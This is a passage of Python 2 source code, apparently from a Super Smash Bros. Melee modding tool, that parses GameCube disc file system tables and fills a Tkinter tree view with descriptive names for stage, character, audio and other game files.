if fileName.startswith( 'GrP' ) and fileName[3] in hexdigits: # For Pokemon Stadium, which follows a slighly different convention (e.g. "GrP2.usd")
index = int( fileName[-1], 16 )
nameOffset = tableOffsets['GrP'] + 0x50 + ( index * 0x20 )
baseStageName = stageNameLookup['Ps.']
elif fileName in tableOffsets and fileExt[1] in hexdigits:
index = int( fileExt[1], 16 )
nameOffset = tableOffsets[fileName] + 0x50 + ( index * 0x20 )
baseStageName = stageNameLookup[fullFileName[2:5]]
return ( nameOffset, baseStageName )
def getStageName( fullFileName, parentIid, cssData ):
""" is20XX is a string; it's empty if we're not working with a version of 20XXHP,
and if it is 20XX, the string can be of the form 3.03, BETA 02, 4.07++, 4.08, etc.
The priority for this process is:
-> Check for 'Random Neutrals' stage names
-> Check for any other special 20XX stage files
-> Check if it's a Target Test stage
-> Check other vanilla file names
-> Assign a default 'Stage file' file name if none of the above find anything """
stageName = ''
if globalDiscDetails['is20XX']:
# Try to recognize stages within the set of 'Random Neutrals' (The sets of 16 stages for each legal neutral stage)
nameOffset, baseStageName = get20xxRandomNeutralNameOffset( fullFileName )
if nameOffset != -1:
# Go to the address pointed to by the table, and read the string there
stageName = cssData[nameOffset:nameOffset+0x20].split('\x00')[0].decode( 'ascii' )
# Check for convenience folders, to determine how to modify the stage description
if parentIid == globalDiscDetails['gameId'].lower(): # No convenience folders
# Get the vanilla stage name as a base for the descriptive name
stageName = baseStageName + ', ' + stageName
else:
stageName = ' ' + stageName # Extra spaces added to indent the name from the stage folder name
return stageName
stageName = specialStagesIn20XX.get( fullFileName[2:], '' )
if stageName:
return stageName
# Check for Target Test stages
if fullFileName[2] == 'T':
characterName = charNameLookup.get( fullFileName[3:5], '' )
if characterName:
if characterName.endswith( 's' ):
stageName = characterName + "'"
else:
stageName = characterName + "'s"
# Check if convenience folders are turned on. If they're not, this name should have more detail
if not parentIid == 't': # Means convenience folders are not turned on
stageName += " Target Test stage"
return stageName
# If still unable to determine, check vanilla file name lookups
stageName = stageNameLookup.get( fullFileName[2:5], '' )
if not stageName:
stageName = 'Stage file'
return stageName
def setStageDescriptions():
cssData = getFileDataFromDiscTreeAsBytes( iid=getCssIid() )
if not cssData: return
# Recursively scan through all files in the treeview, and update the description/filename for stage files
def scanFolder( parentIid='' ):
for iid in Gui.isoFileTree.get_children( parentIid ):
iidValues = Gui.isoFileTree.item( iid, 'values' )
if iidValues[1] == 'file':
fileName = iidValues[4].split( '/' )[-1] # 5th item in iidValues is isoPath
if not fileName.startswith( 'Gr' ): continue
newDescription = getStageName( fileName, parentIid, cssData )
Gui.isoFileTree.item( iid, values=[newDescription] + list( iidValues[1:] ) )
else:
scanFolder( iid )
scanFolder()
def addItemToDiscFileTree( isFolder, isoPath, entryName, entryOffset, entryLength, parent, source, data ):
description = ''
playable_chars = ('PlCa', 'PlCl', 'PlDk', 'PlDr', 'PlFc', 'PlFe', 'PlFx', 'PlGn', 'PlGw', 'PlKb', 'PlKp', 'PlLg', 'PlLk', 'PlMr', 'PlMs', 'PlMt', 'PlNn', 'PlNs', 'PlPc', 'PlPe', 'PlPk', 'PlPp', 'PlPr', 'PlSk', 'PlSs', 'PlYs', 'PlZd') # an array with all playable character .dat names
legal_stages = ('GrNBa', 'GrNLa', 'GrOp', 'GrPs.usd', 'GrSt', 'GrIz') # an array with all the legal stages .dat names
if isFolder:
if entryName == 'audio':
description = '\t - Music and Sound Effects -'
iconImage = Gui.imageBank( 'audioIcon' )
else: iconImage = Gui.imageBank( 'folderIcon' )
Gui.isoFileTree.insert( parent, 'end', iid=isoPath.lower(), text=' ' + entryName, values=(description, 'folder', 'native', '', isoPath, source, ''), image=iconImage )
else: # This is a file.
filenameOnly, ext = os.path.splitext( entryName )
ext = ext.lower()
if not generalBoolSettings['useDiscConvenienceFolders'].get():
# Set a description for the file
if ext in ( '.hps', '.ssm', '.sem' ) and filenameOnly in audioNameLookup:
description = audioNameLookup[ filenameOnly ]
elif entryName.startswith( 'Ef' ):
if entryName == 'EfFxData.dat': description = 'Effects file for Fox & Falco. May cause desync issues.'
else: description = 'Effects file for ' + charNameLookup[ entryName[2:4] ]
elif entryName.startswith( 'GmRstM' ): description = 'Results screen animations for ' + charNameLookup[ entryName[6:8] ]
elif entryName.startswith( 'GmRegend' ): description = 'Congratulations screens'
elif ext == '.mth':
if entryName.startswith( 'MvEnd' ): description = '1-P Ending Movie'
elif filenameOnly in movieNameLookup: description = movieNameLookup[filenameOnly]
elif entryName.startswith('Pl'): # Character file.
colorKey = entryName[4:6]
character = charNameLookup[ entryName[2:4] ]
if character.endswith('s'): description = character + "' "
else: description = character + "'s "
if colorKey == '.d': description += 'NTSC data & shared textures (Desync Warning!) Particle effects can cause desyncs.' # e.g. "PlCa.dat" / added desync warning for netplay/slippi
elif colorKey == '.p': description += 'PAL data & shared textures (Desync Warning!) Particle effects can cause desyncs.'
elif colorKey == '.s': description += 'SDR data & shared textures (Desync Warning!) Particle effects can cause desyncs.'
elif colorKey == 'AJ': description += 'animation data'
elif colorKey == 'Cp':
charName = charNameLookup[ entryName[6:8] ]
if ']' in charName: charName = charName.split(']')[1]
description += 'copy power (' + charName + ')'
elif colorKey == 'DV': description += 'idle animation data'
else: description += charColorLookup[ colorKey ] + ' costume'
if globalDiscDetails['is20XX']:
if ext == '.lat' or colorKey == 'Rl': description += " ('L' alt)"
elif ext == '.rat' or colorKey == 'Rr': description += " ('R' alt)"
elif filenameOnly in miscNameLookup:
description = miscNameLookup[ filenameOnly ]
# Modify file description based on the file's region.
if ext == '.usd' and not entryName.startswith('PlCa'): description += ' (English)'
else:
# Set the file description, then add the file to its respective folder (creating it if it doesn't already exist).
if parent.split('/')[-1] == 'audio' and validOffset( filenameOnly ): # These are 20XX's added custom tracks, e.g. 01.hps, 02.hps, etc.
if not Gui.isoFileTree.exists('hextracks'): Gui.isoFileTree.insert(parent, 'end', iid='hextracks', text=' Hex Tracks', values=('\t- Extra 20XX Custom Tracks -', 'folder', 'notNative', '', isoPath+'/hextracks', source, ''), image=Gui.imageBank('musicIcon') )
parent = 'hextracks'
elif ( entryName.endswith( '.hps' ) or entryName.endswith( '.ssm' ) or entryName.endswith( '.sem' ) ) and filenameOnly in audioNameLookup:
description = audioNameLookup[ filenameOnly ]
elif entryName.startswith( 'Ef' ): # Character Effect files.
if not Gui.isoFileTree.exists( 'ef' ): Gui.isoFileTree.insert(parent, 'end', iid='ef', text=' Ef__Data.dat', values=('\t- Character Graphical Effects -', 'folder', 'notNative', '', isoPath+'/Ef', source, ''), image=Gui.imageBank('folderIcon') )
parent = 'ef'
if entryName == 'EfFxData.dat': description = 'Fox & Falco'
else: description = charNameLookup[ entryName[2:4] ]
elif entryName.startswith( 'GmRegend' ): # Congratulations Screens.
if not Gui.isoFileTree.exists('gmregend'): Gui.isoFileTree.insert(parent, 'end', iid='gmregend', text=' GmRegend__.thp', values=("\t- 'Congratulation' Screens (1P) -", 'folder', 'notNative', '', isoPath+'/GmRegend', source, ''), image=Gui.imageBank('folderIcon') )
parent = 'gmregend'
elif entryName.startswith( 'GmRstM' ): # Results Screen Animations
if not Gui.isoFileTree.exists('gmrstm'): Gui.isoFileTree.insert(parent, 'end', iid='gmrstm', text=' GmRstM__.dat', values=('\t- Results Screen Animations -', 'folder', 'notNative', '', isoPath+'/GmRstM', source, ''), image=Gui.imageBank('folderIcon') )
parent = 'gmrstm'
description = charNameLookup[ entryName[6:8] ]
elif entryName.startswith( 'Gr' ) and not entryName.startswith(legal_stages): # Other Stage Files. / Seperated tournament legal stages from non legal for quality of life
# Create a folder for other stage files (if not already created)
if not Gui.isoFileTree.exists( 'gr2' ):
Gui.isoFileTree.insert(parent, 'end', iid='gr2', text=' Gr__.dat', values=('\t- All Other Stage Files -', 'folder', 'notNative', '', isoPath+'/Gr', source, ''), image=Gui.imageBank('stageIcon2') ) # Added secondary stage folder icon
parent = 'gr2'
if entryName[2] == 'T' and ( ext == '.dat' or entryName == 'GrTLg.0at' ): # This is a Target Test stage. (special case for Luigi's, since his ends in 0at)
# Create a folder for target test stage files (if not already created)
if not Gui.isoFileTree.exists( 't' ):
Gui.isoFileTree.insert( parent, 'end', iid='t', text=' GrT__.dat', values=('Target Test Stages', 'folder', 'notNative', '', isoPath+'/T', source, ''), image=Gui.imageBank('folderIcon') )
parent = 't'
elif entryName[2:5] in onePlayerStages: # For 1-Player modes,like 'Adventure'
if not Gui.isoFileTree.exists( '1p' ):
Gui.isoFileTree.insert( parent, 'end', iid='1p', text='Gr___.___', values=('1P-Mode Stages', 'folder', 'notNative', '', isoPath+'/1P', source, ''), image=Gui.imageBank('folderIcon') )
parent = '1p'
elif globalDiscDetails['is20XX']:
# Modern versions of 20XX (4.06+) have multiple variations of each neutral stage, the 'Random Neutrals' (e.g. GrSt.0at - GrSt.eat)
longName = None
if entryName.startswith( 'GrP' ) and entryName[3] in hexdigits:
shortName = 'GrP'
longName = 'Pokemon Stadium'
elif entryName[-3] in hexdigits:
for shortName in ( 'GrNBa', 'GrNLa', 'GrSt', 'GrIz', 'GrOp' ):
if entryName.startswith( shortName ):
longName = stageNameLookup.get( entryName[2:5], None ) # Vanilla file name lookups
break
if longName:
iid = shortName.lower()
if not Gui.isoFileTree.exists( iid ):
if shortName == 'GrP':
folderName = ' {}_.usd'.format( shortName )
else: folderName = ' {}._at'.format( shortName )
fullIsoPath = isoPath + '/' + shortName
Gui.isoFileTree.insert( 'gr', 'end', iid=iid, text=folderName, values=(longName, 'folder', 'notNative', '', fullIsoPath, source, ''), image=Gui.imageBank('folderIcon') )
parent = iid
elif entryName.startswith(legal_stages): # Legal Stage Files / Seperated tournament legal stages from non legal for quality of life
# Create a folder for legal stage files (if not already created)
if not Gui.isoFileTree.exists( 'gr' ):
Gui.isoFileTree.insert(parent, 'end', iid='gr', text=' Gr__.dat', values=('\t- Legal Stage Files -', 'folder', 'notNative', '', isoPath+'/Gr', source, ''), image=Gui.imageBank('stageIcon') )
parent = 'gr'
elif ext == '.mth': # a video file.
if entryName.startswith( 'MvEnd' ): # 1-P Ending Movie.
if not Gui.isoFileTree.exists('mvend'): Gui.isoFileTree.insert(parent, 'end', iid='mvend', text=' MvEnd__.dat', values=('\t- 1P Mode Ending Movies -', 'folder', 'notNative', '', isoPath+'/MvEnd', source, ''), image=Gui.imageBank('folderIcon') )
parent = 'mvend'
elif filenameOnly in movieNameLookup: description = movieNameLookup[filenameOnly]
elif entryName.startswith(playable_chars): # Playable character file. / Seperated playable characters from non playable character for quality of life
if not Gui.isoFileTree.exists('pl'): Gui.isoFileTree.insert(parent, 'end', iid='pl', text=' Pl__.dat', values=('\t- Playable Character Files -', 'folder', 'notNative', '', isoPath+'/Pl', source, ''), image=Gui.imageBank('charIcon') )
charKey = entryName[2:4]
colorKey = entryName[4:6]
if charKey in charNameLookup:
character = charNameLookup[ charKey ]
# Create a folder for the character (and the copy ability files if this is Kirby) if one does not already exist.
folder = 'pl' + character.replace(' ', '').replace('[','(').replace(']',')') # Spaces or brackets can't be used in the iid.
if not Gui.isoFileTree.exists( folder ):
Gui.isoFileTree.insert( 'pl', 'end', iid=folder, text=' ' + character, values=('', 'folder', 'notNative', '', isoPath+'/'+folder, source, ''), image=Gui.imageBank('folderIcon') )
parent = folder
# Prepare the file's description.
if character.endswith('s'): description = character + "' "
else: description = character + "'s "
if colorKey == '.d': description += 'NTSC data & shared textures (Desync Warning!) Particle effects can cause desyncs.' # e.g. "PlCa.dat" / added desync warning for netplay/slippi
elif colorKey == '.p': description += 'PAL data & shared textures (Desync Warning!) Particle effects can cause desyncs.'
elif colorKey == '.s': description += 'SDR data & shared textures (Desync Warning!) Particle effects can cause desyncs.'
elif colorKey == 'AJ': description += 'animation data'
elif colorKey == 'Cp':
charName = charNameLookup[ entryName[6:8] ]
if ']' in charName: charName = charName.split(']')[1]
description += 'copy power (' + charName + ')'
elif colorKey == 'DV': description += 'idle animation data'
elif colorKey in charColorLookup: description += charColorLookup[ colorKey ] + ' costume'
if globalDiscDetails['is20XX']:
if ext == '.lat' or colorKey == 'Rl': description += " ('L' alt)"
elif ext == '.rat' or colorKey == 'Rr': description += " ('R' alt)"
elif entryName.startswith('Pl') and not entryName.startswith(playable_chars) and entryName != 'PlCo.dat': # Other character file / Seperated playable characters from non playable character for quality of life
if not Gui.isoFileTree.exists('pl2'): Gui.isoFileTree.insert(parent, 'end', iid='pl2', text=' Pl__.dat', values=('\t- Other Character Files -', 'folder', 'notNative', '', isoPath+'/Pl', source, ''), image=Gui.imageBank('charIcon2') )
charKey = entryName[2:4]
colorKey = entryName[4:6]
if charKey in charNameLookup:
character = charNameLookup[ charKey ]
# Create a folder for the character (and the copy ability files if this is Kirby) if one does not already exist.
folder = 'pl2' + character.replace(' ', '').replace('[','(').replace(']',')') # Spaces or brackets can't be used in the iid.
if not Gui.isoFileTree.exists( folder ):
Gui.isoFileTree.insert( 'pl2', 'end', iid=folder, text=' ' + character, values=('', 'folder', 'notNative', '', isoPath+'/'+folder, source, ''), image=Gui.imageBank('folderIcon') )
parent = folder
# Prepare the file's description.
if character.endswith('s'): description = character + "' "
else: description = character + "'s "
if colorKey == '.d': description += 'NTSC data & shared textures (Desync Warning!) Particle effects can cause desyncs.' # e.g. "PlCa.dat" / added deync warning for netplay/slippi
elif colorKey == '.p': description += 'PAL data & shared textures (Desync Warning!) Particle effects can cause desyncs.'
elif colorKey == '.s': description += 'SDR data & shared textures (Desync Warning!) Particle effects can cause desyncs.'
elif colorKey == 'AJ': description += 'animation data'
elif colorKey == 'Cp':
charName = charNameLookup[ entryName[6:8] ]
if ']' in charName: charName = charName.split(']')[1]
description += 'copy power (' + charName + ')'
elif colorKey == 'DV': description += 'idle animation data'
elif colorKey in charColorLookup: description += charColorLookup[ colorKey ] + ' costume'
if globalDiscDetails['is20XX']:
if ext == '.lat' or colorKey == 'Rl': description += " ('L' alt)"
elif ext == '.rat' or colorKey == 'Rr': description += " ('R' alt)"
elif entryName.startswith('Ty'): # Trophy file
if not Gui.isoFileTree.exists('ty'): Gui.isoFileTree.insert( parent, 'end', iid='ty', text=' Ty__.dat', values=('\t- Trophies -', 'folder', 'notNative', '', isoPath+'/Ty', source, ''), image=Gui.imageBank('folderIcon') )
parent = 'ty'
elif filenameOnly in miscNameLookup: description = miscNameLookup[ filenameOnly ]
# Modify file description based on the file's region.
if ext == '.usd' and not entryName.startswith('PlCa'): description += ' (English)'
# Add a file to the treeview (all files (not folders) besides system files should be added with the line below).
fullPath = isoPath + '/' + entryName
Gui.isoFileTree.insert( parent, 'end', iid=fullPath.lower(), text=' ' + entryName, values=(description, 'file', uHex(entryOffset), entryLength, fullPath, source, data) )
def scanDisc( updateStatus=True, preserveTreeState=False, updateDetailsTab=True, switchTab=True, updatedFiles=None ):
globalDiscDetails['rebuildRequired'] = False
if preserveTreeState:
# Get the iids of all open folders
openIids = []
def getOpenFolders( openIids, parentIid='' ):
for iid in Gui.isoFileTree.get_children( parentIid ):
if Gui.isoFileTree.item( iid, 'values' )[1] == 'folder':
if Gui.isoFileTree.item( iid, 'open' ): openIids.append( iid )
openIids = getOpenFolders( openIids, iid )
return openIids
openFolders = getOpenFolders( openIids )
# Remember the selection, focus, and current scroll position of the treeview
originalGameId = Gui.isoFileTree.get_children()[0] # The gameId might have been modified. If so, the file/folder selections and focus iids below will need to be updated before restoration.
originalTreeSelection = Gui.isoFileTree.selection()
originalTreeFocus = Gui.isoFileTree.focus()
originalTreeScrollPosition = Gui.isoFileScroller.get()[0] # .get() returns e.g. (0.49505277044854884, 0.6767810026385225)
if switchTab:
currentlySelectedTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
if currentlySelectedTab != Gui.discTab and currentlySelectedTab != Gui.discDetailsTab:
Gui.mainTabFrame.select( Gui.discTab ) # Switch to the Disc File Tree tab
initializeDiscFileTree( not preserveTreeState )
# Get basic info on the disc
gameId, dolOffset, fstOffset, dolSize, fstSize, fstData, apploaderSize = getDiscSystemFileInfo( globalDiscDetails['isoFilePath'] )
# Assemble a filesystem from the FST.
numberOfEntries, entries, strings = readFST( fstData ) # Returns an int and two lists
# Add the root folder
isoPath = gameId
parent = isoPath.lower()
source = 'iso'
# The 'native' value below indicates that this is a folder native to the FST
Gui.isoFileTree.insert( '', 'end', iid=isoPath.lower(), text=' ' + gameId + ' (root)', open=True, values=('', 'folder', 'native', '', isoPath, source, ''), image=Gui.imageBank('meleeIcon') )
# Add the system files
Gui.isoFileTree.insert( isoPath.lower(), 'end', iid=parent + '/sys', text=' System files', values=('', 'folder', 'notNative', '', isoPath, source, ''), image=Gui.imageBank('folderIcon') )
Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/boot.bin', text=' Boot.bin', values=('Disc Header (.hdr), Part 1', 'file', '0', 0x440, isoPath+'/Boot.bin', source, '') )
Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/bi2.bin', text=' Bi2.bin', values=('Disc Header (.hdr), Part 2', 'file', '0x440', 0x2000, isoPath+'/Bi2.bin', source, '') )
Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/apploader.ldr', text=' AppLoader.ldr', values=('Executable bootloader', 'file', '0x2440', apploaderSize, isoPath+'/Apploader.ldr', source, '') )
Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/start.dol', text=' Start.dol', values=('Main game executable', 'file', uHex(dolOffset), dolSize, isoPath+'/Start.dol', source, '') )
Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/game.toc', text=' Game.toc', values=("The disc's file system table (FST)", 'file', uHex(fstOffset), fstSize, isoPath+'/Game.toc', source, '') )
# Check whether the disc is SSBM and 20XX (and if so, gets their versions)
checkMeleeVersion()
check20xxVersion( entries, strings )
# For each entry (subdirectory/file) in the ISO.
i = 1
dirEndIndexes = [numberOfEntries]
totalFiles = 5 # Starts at 5 due to the system files above.
for entry in entries[1:]: # Skips the first (root) entry.
if programClosing: return
else:
entryOffset = int( entry[8:16], 16 )
entryLength = int( entry[16:24], 16 )
entryName = strings[i - 1]
#print 'entry', str(i) + ':', entry[:8], entry[8:16], entry[16:24], '\t\t', hex(entryOffset), hex(entryLength), entryName
# If the last directory has been exhausted, remove the last directory from the current path.
while i == dirEndIndexes[-1]: # 'while' is used instead of 'if' in case multiple directories are ending (being backed out of) at once
isoPath = '/'.join( isoPath.split('/')[:-1] )
dirEndIndexes.pop()
parent = isoPath.lower() # Differentiated here because parent may be changed for "convenience" folders (those not native to the ISO)
# Differentiate between new subdirectory or file
if entry[1] == '1':
isoPath += '/' + entryName
dirEndIndexes.append( entryLength )
else:
totalFiles = totalFiles + 1
addItemToDiscFileTree( int(entry[1]), isoPath, entryName, entryOffset, entryLength, parent, source, '' )
# The following code is ad hoc code used occasionally for some research/testing purposes
# iid = (isoPath+'/'+entryName).lower()
# fileData = getFileDataFromDiscTreeAsBytes( iid=iid )
# if not fileData:
# print 'skipping disc item', entryName, '(no file data)'
# elif entryName.startswith( 'Gr' ):
# datFile = hsdFiles.datFileObj( source='disc' )
# datFile.load( iid, fileData=fileData, fileName=entryName )
# for structOffset, string in datFile.rootNodes:
# if string == 'coll_data':
# #mapHeadStruct = datFile.getStruct( structOffset )
# print '\nFound coll_data for', entryName + '. length:', uHex(datFile.getStructLength( structOffset ))
# #print 'offset:', uHex(0x20+mapHeadStruct.offset), ' length:', uHex(mapHeadStruct.length)
# #print mapHeadStruct.data
# # if mapHeadStruct.values[8] != 0:
# # print 'Uses Array_5', mapHeadStruct.values[9]
# break
# end of test code
i += 1
# Now that the CSS has been loaded in the treeview, we can use it to update the stage names
if globalDiscDetails['isMelee']: setStageDescriptions()
# Enable the GUI's buttons and update other labels
for widget in Gui.isoOpsPanelButtons.winfo_children():
widget.config( state='normal' )
Gui.isoFileCountText.set( "{:,}".format(totalFiles) )
if updateStatus: updateProgramStatus( 'Disc Scan Complete' )
def updateIids( iidList ):
updatedIidList = []
for iid in iidList:
if '/' in iid: updatedIidList.append( gameId + '/' + '/'.join(iid.split('/')[1:]) )
else: updatedIidList.append( iid )
return tuple( updatedIidList )
# Recreate the prior state of the treeview
gameId = gameId.lower()
if preserveTreeState:
# Update the file/folder selections and focus iids with the new gameId if it has changed.
if originalGameId != gameId:
openFolders = updateIids( openFolders )
originalTreeSelection = updateIids( originalTreeSelection )
if '/' in originalTreeFocus: originalTreeFocus = gameId + '/' + '/'.join(originalTreeFocus.split('/')[1:])
# Open all folders that were previously open.
for folder in openFolders:
if Gui.isoFileTree.exists( folder ): Gui.isoFileTree.item( folder, open=True )
# Set the current selections and scroll position back to what it was.
Gui.isoFileTree.selection_set( originalTreeSelection )
Gui.isoFileTree.focus( originalTreeFocus )
Gui.isoFileTree.yview_moveto( originalTreeScrollPosition )
# Highlight recently updated files in green
if updatedFiles:
# Update the file iids with the new gameId if it has changed.
if originalGameId != gameId: updatedFiles = updateIids( updatedFiles )
# Add save highlighting tags to the given items
for iid in updatedFiles:
if Gui.isoFileTree.exists( iid ):
# Add a tag to highlight this item
Gui.isoFileTree.item( iid, tags='changesSaved' )
# Add tags to highlight the parent (folder) items
parent = Gui.isoFileTree.parent( iid )
while parent != gameId:
Gui.isoFileTree.item( parent, tags='changesSaved' )
parent = Gui.isoFileTree.parent( parent )
# Update the treeview's header text and its function call for the next (reversed) sort.
Gui.isoFileTree.heading( '#0', text='File (Sorted by FST)' )
Gui.isoFileTree.heading( '#0', command=lambda: treeview_sort_column(Gui.isoFileTree, 'file', False) )
if updateDetailsTab: populateDiscDetails()
def promptToOpenRoot():
# Prompt for a directory to retrieve files from.
rootPath = tkFileDialog.askdirectory(
title='Choose a root directory (folder of disc files).',
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
#parent=Gui.root,
mustexist=True )
if rootPath and isRootFolder( rootPath )[0]: # A path was chosen above and it's a disc root directory (isRoot includes error messages if it's not)
rememberFile( rootPath )
globalDiscDetails['isoFilePath'] = rootPath
scanRoot()
def scanRoot( switchTab=True, updateDetailsTab=True ):
rootPath = os.path.normpath( globalDiscDetails['isoFilePath'] ).replace( '\\', '/' ) # Let's not deal with escape characters in our paths, shall we?
# Make sure this is a root folder, and get the main system files
validRootFolder, sysFolder, gcrSystemFiles = isRootFolder( rootPath )
if not validRootFolder: return
# Initial error checking complete. Populate the file tree
if switchTab:
currentlySelectedTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
if currentlySelectedTab != Gui.discTab and currentlySelectedTab != Gui.discDetailsTab:
Gui.mainTabFrame.select( Gui.discTab ) # Switch to the Disc File Tree tab
initializeDiscFileTree( True )
# Get basic info on the disc
if gcrSystemFiles: bootFilePath = rootPath + '/' + sysFolder + '/iso.hdr'
else: bootFilePath = rootPath + '/' + sysFolder + '/boot.bin'
apploaderFilePath = rootPath + '/' + sysFolder + '/apploader.ldr'
gameId, dolOffset, fstOffset, dolSize, _, fstData, apploaderSize = getDiscSystemFileInfo( bootFilePath, apploaderPath=apploaderFilePath )
# Add the root folder
isoPath = gameId
parent = isoPath.lower()
source = 'path' # The 'native' value below indicates that this is a folder native to the filesystem
Gui.isoFileTree.insert( '', 'end', iid=parent, text=' ' + gameId + ' (root)', open=True, values=('', 'folder', 'native', '', isoPath, source, ''), image=Gui.imageBank('meleeIcon') )
# Add the system files
Gui.isoFileTree.insert( isoPath.lower(), 'end', iid=parent + '/sys', text=' System files', values=('', 'folder', 'notNative', '', isoPath, source, ''), image=Gui.imageBank('folderIcon') )
if not gcrSystemFiles:
Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/boot.bin', text=' Boot.bin', values=('Disc Header (.hdr), Part 1', 'file', '0', 0x440, isoPath+'/Boot.bin', source, rootPath + '/' + sysFolder + '/boot.bin') )
Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/bi2.bin', text=' Bi2.bin', values=('Disc Header (.hdr), Part 2', 'file', '0x440', 0x2000, isoPath+'/Bi2.bin', source, rootPath + '/' + sysFolder + '/bi2.bin') )
totalFiles = 4
headerFilePath = rootPath + '/' + sysFolder + '/boot.bin'
else:
Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/iso.hdr', text=' ISO.hdr', values=('Disc Header', 'file', '0', 0x2440, isoPath+'/ISO.hdr', source, rootPath + '/' + sysFolder + '/iso.hdr') )
totalFiles = 3
headerFilePath = rootPath + '/' + sysFolder + '/iso.hdr'
Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/apploader.ldr', text=' AppLoader.ldr', values=('Executable bootloader', 'file', '0x2440', apploaderSize, isoPath+'/Apploader.ldr', source, apploaderFilePath) )
Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/start.dol', text=' Start.dol', values=('Main game executable', 'file', uHex(dolOffset), dolSize, isoPath+'/Start.dol', source, rootPath + '/' + sysFolder + '/start.dol') )
# Get the offset for the FST
with open( headerFilePath, 'rb') as bootBinFile:
bootBinFile.seek( 0x424 )
fstOffset = toInt( bootBinFile.read( 4 ) )
# Check whether the disc is SSBM and 20XX (and if so, gets their versions)
checkMeleeVersion()
check20xxVersion()
entryOffset = 0 # This will be adjusted for each entry once the size of the FST is known.
filenamesTooLong = []
def loadItemsInDirectory( directory, totalFiles, entryOffset ):
for entryName in os.listdir( directory ):
if programClosing: return '', 0, 0, ''
elif entryName == sysFolder: continue
elif len( os.path.splitext(entryName)[0] ) >= 30: # This is the max character length for file names
filenamesTooLong.append( directory + '/' + entryName )
continue
fullPath = directory + '/' + entryName
# Get the relative difference between this these paths
isoPath = gameId + directory.replace( rootPath, '' )
parent = isoPath.lower()
# Differentiate between new subdirectory or file
if os.path.isdir( fullPath ):
isoPath += '/' + entryName
addItemToDiscFileTree( True, isoPath, entryName, entryOffset, '', parent, source, fullPath )
totalFiles, entryOffset = loadItemsInDirectory( fullPath, totalFiles, entryOffset )
else:
# Consider alignment adjustment for the last file and padding, to be added to the offset for this file.
alignmentAdjustment = roundTo32( entryOffset, base=4 ) - entryOffset # i.e. how many bytes away from being aligned.
entryOffset += alignmentAdjustment
entryLength = int( os.path.getsize(fullPath) )
addItemToDiscFileTree( False, isoPath, entryName, entryOffset, entryLength, parent, source, fullPath )
# Determine the offset for the next file (excluding padding).
entryOffset += entryLength
totalFiles += 1
return totalFiles, entryOffset
totalFiles, entryOffset = loadItemsInDirectory( rootPath, totalFiles, entryOffset ) # entryOffset will be the total space used by all non-system files, including alignment adjustments.
# Now that the CSS has been loaded in the treeview, we can update the stage names using it
if globalDiscDetails['isMelee']: setStageDescriptions()
# Generate a new FST based on the files shown in the GUI, and determine how much space it will use
newFstData = generateFST()
fstFileSize = len( newFstData )/2
alignmentAdjustment = roundTo32( fstFileSize, base=4 ) - fstFileSize # i.e. how many bytes away from being aligned.
spaceForHeaderAndSystemFiles = fstOffset + fstFileSize + alignmentAdjustment
# Add the FST to the file tree
addItemToDiscFileTree( False, gameId, 'Game.toc', fstOffset, fstFileSize, gameId.lower() + '/sys', 'ram', newFstData )
# Determine how much padding to allocate between files.
if not gcrSystemFiles: totalNonSystemFiles = totalFiles - 4
else: totalNonSystemFiles = totalFiles - 3
interFilePaddingLength = getInterFilePaddingLength( totalNonSystemFiles, spaceForHeaderAndSystemFiles + entryOffset )
# Now that the size (length) of inter-file padding and all system files are known, update the offsets of all items
def updateEntryOffsets( parentIid, paddingDisplacement ): # Collect a list of all files in the file tree, and add up their total space used.
if parentIid == gameId.lower() + '/sys': return 0
for iid in Gui.isoFileTree.get_children( parentIid ):
iidValues = Gui.isoFileTree.item( iid, 'values' )
if iidValues[1] == 'file':
paddingDisplacement += interFilePaddingLength # This is cumulative, for each file
try: newOffset = int( iidValues[2], 16 ) + spaceForHeaderAndSystemFiles + paddingDisplacement
except: newOffset = 'n/a'
Gui.isoFileTree.item( iid, values=(iidValues[0], iidValues[1], uHex(newOffset), iidValues[3], iidValues[4], iidValues[5], iidValues[6]) )
else: # This is a folder
paddingDisplacement = updateEntryOffsets( iid, paddingDisplacement )
return paddingDisplacement
paddingDisplacement = updateEntryOffsets( '', 0 )
globalDiscDetails['rebuildRequired'] = True
# Update the file count display (on the disc details tab) and program status
Gui.isoFileCountText.set( "{:,}".format(totalFiles) )
updateProgramStatus( 'Root Scan Complete' )
# Update the treeview's header text and its function call for the next (reversed) sort.
Gui.isoFileTree.heading( '#0', text='File (Sorted by FST)' )
Gui.isoFileTree.heading( '#0', command=lambda: treeview_sort_column(Gui.isoFileTree, 'file', False) )
if filenamesTooLong:
msg( 'These files were excluded, because their file name is longer than 29 characters:\n\n' + '\n'.join( filenamesTooLong ) )
if updateDetailsTab:
predictedFinalDiscSize = spaceForHeaderAndSystemFiles + entryOffset + paddingDisplacement
populateDiscDetails( discSize=predictedFinalDiscSize )
def readFST( fstData ):
""" Parses a GC disc's FST/TOC (File System Table/Table of Contents), and builds a list of
entries (files and folders), along with their corresponding names. Input is a hex string, because this is an old function. :/ """
numberOfEntries = int( fstData[16:24], 16 ) # An "entry" may be a file or directory. This value is taken from [0x8:0xC] of the root entry.
lenOfEntriesSection = numberOfEntries * 0xC * 2 # Multiplied by 2 to count by nibbles in the string, rather than bytes.
fst = fstData[:lenOfEntriesSection]
entries = [ fst[i:i+0x18] for i in xrange(0, len(fst), 0x18) ] # Splits the FST into groups of 0xC bytes (0x18 nibbles), i.e. one entry each.
strings = fstData[lenOfEntriesSection:].decode('hex').split('\x00')
return ( numberOfEntries, entries, strings )
def generateFST(): # Generates and returns a new File System Table (Game.toc).
rootIid = Gui.isoFileTree.get_children()
gameId = globalDiscDetails['gameId'].lower()
def childItemCount( folder, gameId ): # Recursively get the count of all items (both files and folders) in the given folder.
itemCount = 0
for iid in Gui.isoFileTree.get_children( folder ):
